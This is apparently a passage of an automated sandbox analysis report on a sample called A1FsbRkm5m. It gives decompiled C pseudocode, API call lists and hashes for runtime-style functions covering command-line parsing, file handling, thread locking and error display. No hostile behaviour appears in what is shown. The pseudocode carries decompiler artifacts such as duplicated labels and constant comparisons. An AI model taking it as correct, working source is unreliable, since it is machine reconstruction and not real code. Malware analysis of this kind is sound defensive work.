                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00407B60
                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00407B6F
                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00407B7B
                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00407B93
                                                                                                                                                                                          • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00407BB7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                                                                                                                                          • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                                                                                                          • API String ID: 1416857345-3736581797
                                                                                                                                                                                          • Opcode ID: a430df52fef8c432dba606b690dc2a5b7376c3b23e3569d5b0345d39821fca1a
                                                                                                                                                                                          • Instruction ID: 32a8b66fc92957f21ca9bbef851e7a8d2f13c74dcc19ac79790c4ff9c798c5cc
                                                                                                                                                                                          • Opcode Fuzzy Hash: a430df52fef8c432dba606b690dc2a5b7376c3b23e3569d5b0345d39821fca1a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 49112471A48301AFE310AF55CC45F66B7E8EF45754F208436B944AB3C1D6B8BD40C7AA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402A1C Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00402A1C(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E0040500C(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















                                                                                                                                                                                          0x00402a20
                                                                                                                                                                                          0x00402a22
                                                                                                                                                                                          0x00402a2e
                                                                                                                                                                                          0x00402a2e
                                                                                                                                                                                          0x00402a2e
                                                                                                                                                                                          0x00402a32
                                                                                                                                                                                          0x00402a2c
                                                                                                                                                                                          0x00402a2c
                                                                                                                                                                                          0x00402a2e
                                                                                                                                                                                          0x00402a2e
                                                                                                                                                                                          0x00402a32
                                                                                                                                                                                          0x00402a2c
                                                                                                                                                                                          0x00402a2c
                                                                                                                                                                                          0x00402a38
                                                                                                                                                                                          0x00402a3b
                                                                                                                                                                                          0x00402a48
                                                                                                                                                                                          0x00402a4a
                                                                                                                                                                                          0x00402a91
                                                                                                                                                                                          0x00402a91
                                                                                                                                                                                          0x00402a95
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402a50
                                                                                                                                                                                          0x00402a84
                                                                                                                                                                                          0x00402a8d
                                                                                                                                                                                          0x00402a8f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402a8f
                                                                                                                                                                                          0x00402a58
                                                                                                                                                                                          0x00402a6a
                                                                                                                                                                                          0x00402a6a
                                                                                                                                                                                          0x00402a6e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402a5d
                                                                                                                                                                                          0x00402a66
                                                                                                                                                                                          0x00402a68
                                                                                                                                                                                          0x00402a68
                                                                                                                                                                                          0x00402a77
                                                                                                                                                                                          0x00402a7f
                                                                                                                                                                                          0x00402a7f
                                                                                                                                                                                          0x00402a77
                                                                                                                                                                                          0x00402a9b
                                                                                                                                                                                          0x00402aa0
                                                                                                                                                                                          0x00402aa2
                                                                                                                                                                                          0x00402aa4
                                                                                                                                                                                          0x00402af9
                                                                                                                                                                                          0x00402af9
                                                                                                                                                                                          0x00402afd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402aaa
                                                                                                                                                                                          0x00402ae5
                                                                                                                                                                                          0x00402aec
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402aee
                                                                                                                                                                                          0x00402aee
                                                                                                                                                                                          0x00402af0
                                                                                                                                                                                          0x00402af3
                                                                                                                                                                                          0x00402af4
                                                                                                                                                                                          0x00402af5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402aee
                                                                                                                                                                                          0x00402ab2
                                                                                                                                                                                          0x00402acb
                                                                                                                                                                                          0x00402acb
                                                                                                                                                                                          0x00402acf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402ab7
                                                                                                                                                                                          0x00402abe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402ac0
                                                                                                                                                                                          0x00402ac0
                                                                                                                                                                                          0x00402ac2
                                                                                                                                                                                          0x00402ac5
                                                                                                                                                                                          0x00402ac6
                                                                                                                                                                                          0x00402ac7
                                                                                                                                                                                          0x00402ac0
                                                                                                                                                                                          0x00402ad8
                                                                                                                                                                                          0x00402ae0
                                                                                                                                                                                          0x00402ae0
                                                                                                                                                                                          0x00402ad8
                                                                                                                                                                                          0x00402b05
                                                                                                                                                                                          0x00402a43
                                                                                                                                                                                          0x00402a43
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402a43
                                                                                                                                                                                          0x00402a3b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                          • String ID: "$"
                                                                                                                                                                                          • API String ID: 3213498283-3758156766
                                                                                                                                                                                          • Opcode ID: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                                                                                                                                                          • Instruction ID: 7f4eabc370d0c2b1a65279813ceea620399496a62879659d683f8910f88fef49
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3621E5447443D21ADF7169B90EC83A76B894B5A31872804BB9582B63CBDCFC48479B6E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402D70 Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                          			E00402D70(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402cc4;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00402D04;
				}
				_t59[9] = E00402D50;
				_t59[8] = E00402D00;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00402D00;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x49e3e8) {
							_t31 = GetStdHandle(0xfffffff5);
						} else {
							_t31 = GetStdHandle(0xfffffff4);
						}
					} else {
						_t31 = GetStdHandle(0xfffffff6);
					}
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00402D04;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















                                                                                                                                                                                          0x00402d71
                                                                                                                                                                                          0x00402d75
                                                                                                                                                                                          0x00402d78
                                                                                                                                                                                          0x00402d84
                                                                                                                                                                                          0x00402d91
                                                                                                                                                                                          0x00402d96
                                                                                                                                                                                          0x00402d9b
                                                                                                                                                                                          0x00402da0
                                                                                                                                                                                          0x00402d86
                                                                                                                                                                                          0x00402d87
                                                                                                                                                                                          0x00402da9
                                                                                                                                                                                          0x00402dae
                                                                                                                                                                                          0x00402db3
                                                                                                                                                                                          0x00402d89
                                                                                                                                                                                          0x00402d8a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402dba
                                                                                                                                                                                          0x00402dbf
                                                                                                                                                                                          0x00402dc4
                                                                                                                                                                                          0x00402dc4
                                                                                                                                                                                          0x00402dc9
                                                                                                                                                                                          0x00402dc9
                                                                                                                                                                                          0x00402dd0
                                                                                                                                                                                          0x00402dd7
                                                                                                                                                                                          0x00402de2
                                                                                                                                                                                          0x00402ea0
                                                                                                                                                                                          0x00402ea7
                                                                                                                                                                                          0x00402eae
                                                                                                                                                                                          0x00402eb7
                                                                                                                                                                                          0x00402ec3
                                                                                                                                                                                          0x00402ecb
                                                                                                                                                                                          0x00402ec5
                                                                                                                                                                                          0x00402ecb
                                                                                                                                                                                          0x00402ecb
                                                                                                                                                                                          0x00402eb9
                                                                                                                                                                                          0x00402ecb
                                                                                                                                                                                          0x00402ecb
                                                                                                                                                                                          0x00402ed3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402ed5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402de8
                                                                                                                                                                                          0x00402df8
                                                                                                                                                                                          0x00402e00
                                                                                                                                                                                          0x00402f0e
                                                                                                                                                                                          0x00402f0e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402f14
                                                                                                                                                                                          0x00402e06
                                                                                                                                                                                          0x00402e0e
                                                                                                                                                                                          0x00402ed7
                                                                                                                                                                                          0x00402edd
                                                                                                                                                                                          0x00402ef6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402ef6
                                                                                                                                                                                          0x00402ee1
                                                                                                                                                                                          0x00402ee8
                                                                                                                                                                                          0x00402efc
                                                                                                                                                                                          0x00402f01
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402f07
                                                                                                                                                                                          0x00402eed
                                                                                                                                                                                          0x00402eef
                                                                                                                                                                                          0x00402eef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402eed
                                                                                                                                                                                          0x00402e14
                                                                                                                                                                                          0x00402e21
                                                                                                                                                                                          0x00402e22
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402e28
                                                                                                                                                                                          0x00402e2d
                                                                                                                                                                                          0x00402e2f
                                                                                                                                                                                          0x00402e2f
                                                                                                                                                                                          0x00402e3e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402e44
                                                                                                                                                                                          0x00402e59
                                                                                                                                                                                          0x00402e5e
                                                                                                                                                                                          0x00402e60
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402e66
                                                                                                                                                                                          0x00402e68
                                                                                                                                                                                          0x00402e74
                                                                                                                                                                                          0x00402e88
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402e98
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402e98
                                                                                                                                                                                          0x00402e88
                                                                                                                                                                                          0x00402e76
                                                                                                                                                                                          0x00402e76
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402e68
                                                                                                                                                                                          0x00402e3e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402DF8
                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E1C
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E38
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402E59
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402E82
                                                                                                                                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402E90
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00402ECB
                                                                                                                                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00402EE1
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402EFC
                                                                                                                                                                                          • GetLastError.KERNEL32(000000F5), ref: 00402F14
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1694776339-0
                                                                                                                                                                                          • Opcode ID: 00e43a6318e06e0d29d6f46cabe62da0d47927247b7b352848dcd54d30d8a268
                                                                                                                                                                                          • Instruction ID: 9aa9312da4e91c771af0b4e33a38407941ada986436eec9a0907e2913daab745
                                                                                                                                                                                          • Opcode Fuzzy Hash: 00e43a6318e06e0d29d6f46cabe62da0d47927247b7b352848dcd54d30d8a268
                                                                                                                                                                                          • Instruction Fuzzy Hash: 31418C30140701AAE730AF24CA4DB6775A5AF00754F208E3FE5A6BA6E0D7FD9841979D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004214B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E004214B8(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x49de40; // 0x49e034
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t61 =  *0x49dbc8; // 0x41744c
					E0040D23C(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
					E00404378();
				}
				if(_t53 <= 0) {
					E0042146C();
				} else {
					E00421478(_t53);
				}
				_v16 = 0;
				_push(0x49e86c);
				L00406FE0();
				_push(_t72);
				_push(0x421646);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange( &E0049B5C4, _v16);
				_push(_t72);
				_push(0x421627);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L15:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E0042162E);
					return E00403BEC(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E0041AC6C(_v16, 0);
						E0041AB5C(_v16, 0);
						L004071A0();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x4215f1, _t72, 0x49e86c);
						_pop(_t66);
						 *[fs:eax] = _t66;
						_t67 = 0x4215c2;
						 *[fs:eax] = _t67;
						_push(E004215F8);
						_push(0x49e86c);
						L00406FE0();
						return 0;
					} else {
						goto L15;
					}
				}
			}



















                                                                                                                                                                                          0x004214b9
                                                                                                                                                                                          0x004214bb
                                                                                                                                                                                          0x004214bf
                                                                                                                                                                                          0x004214c0
                                                                                                                                                                                          0x004214c1
                                                                                                                                                                                          0x004214c3
                                                                                                                                                                                          0x004214c8
                                                                                                                                                                                          0x004214d0
                                                                                                                                                                                          0x004214d7
                                                                                                                                                                                          0x004214da
                                                                                                                                                                                          0x004214e4
                                                                                                                                                                                          0x004214f1
                                                                                                                                                                                          0x004214f6
                                                                                                                                                                                          0x004214f6
                                                                                                                                                                                          0x004214fd
                                                                                                                                                                                          0x00421508
                                                                                                                                                                                          0x004214ff
                                                                                                                                                                                          0x00421501
                                                                                                                                                                                          0x00421501
                                                                                                                                                                                          0x0042150f
                                                                                                                                                                                          0x00421512
                                                                                                                                                                                          0x00421517
                                                                                                                                                                                          0x0042151e
                                                                                                                                                                                          0x0042151f
                                                                                                                                                                                          0x00421524
                                                                                                                                                                                          0x00421527
                                                                                                                                                                                          0x00421538
                                                                                                                                                                                          0x0042153d
                                                                                                                                                                                          0x0042153e
                                                                                                                                                                                          0x00421543
                                                                                                                                                                                          0x00421546
                                                                                                                                                                                          0x0042154d
                                                                                                                                                                                          0x00421558
                                                                                                                                                                                          0x0042155c
                                                                                                                                                                                          0x0042155c
                                                                                                                                                                                          0x0042155c
                                                                                                                                                                                          0x0042155e
                                                                                                                                                                                          0x00421565
                                                                                                                                                                                          0x00421611
                                                                                                                                                                                          0x00421613
                                                                                                                                                                                          0x00421616
                                                                                                                                                                                          0x00421619
                                                                                                                                                                                          0x00421626
                                                                                                                                                                                          0x0042156b
                                                                                                                                                                                          0x0042160b
                                                                                                                                                                                          0x0042157a
                                                                                                                                                                                          0x00421582
                                                                                                                                                                                          0x0042158c
                                                                                                                                                                                          0x0042159c
                                                                                                                                                                                          0x004215aa
                                                                                                                                                                                          0x004215b5
                                                                                                                                                                                          0x004215ba
                                                                                                                                                                                          0x004215bd
                                                                                                                                                                                          0x004215db
                                                                                                                                                                                          0x004215de
                                                                                                                                                                                          0x004215e1
                                                                                                                                                                                          0x004215e6
                                                                                                                                                                                          0x004215eb
                                                                                                                                                                                          0x004215f0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042160b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004214C3
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004214D2
                                                                                                                                                                                            • Part of subcall function 0042146C: ResetEvent.KERNEL32(00000214,0042150D,?,?,00000000), ref: 00421472
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049E86C,?,?,00000000), ref: 00421517
                                                                                                                                                                                          • InterlockedExchange.KERNEL32(0049B5C4,?), ref: 00421533
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0049E86C,00000000,00421627,?,00000000,00421646,?,0049E86C,?,?,00000000), ref: 0042158C
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049E86C,004215F8,00421627,?,00000000,00421646,?,0049E86C,?,?,00000000), ref: 004215EB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                                                                                                                                                          • String ID: 4I$LtA
                                                                                                                                                                                          • API String ID: 2189153385-4143330910
                                                                                                                                                                                          • Opcode ID: 9df671befd0559164bdf9a2b2f9f914a41e4678e38533ce31647a3c6e0478cce
                                                                                                                                                                                          • Instruction ID: c7144f3b078a98dbb88dc3215a2fca8a3d1431468ba3915c2d0e15c961d82a4d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9df671befd0559164bdf9a2b2f9f914a41e4678e38533ce31647a3c6e0478cce
                                                                                                                                                                                          • Instruction Fuzzy Hash: DA31EA30B04204BFD711DF65E852A6D7BF8EB59704F9184B7F401932A1D77D9D40CA29
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D058 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56filewindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040D058(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040CED0(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x49dc84; // 0x49e04c
				if( *_t14 == 0) {
					_t16 =  *0x49d864; // 0x407db4
					_t9 = _t16 + 4; // 0xffd2
					_t18 =  *0x49e668; // 0x400000
					LoadStringA(E00405FDC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x49d8f8; // 0x49e21c
				E004028C4(E00402FCC(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00409F88( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40d11c, 2,  &_v1092, 0);
			}












                                                                                                                                                                                          0x0040d067
                                                                                                                                                                                          0x0040d06c
                                                                                                                                                                                          0x0040d074
                                                                                                                                                                                          0x0040d0db
                                                                                                                                                                                          0x0040d0e0
                                                                                                                                                                                          0x0040d0e4
                                                                                                                                                                                          0x0040d0ef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040d105
                                                                                                                                                                                          0x0040d076
                                                                                                                                                                                          0x0040d080
                                                                                                                                                                                          0x0040d08f
                                                                                                                                                                                          0x0040d09f
                                                                                                                                                                                          0x0040d0b2
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
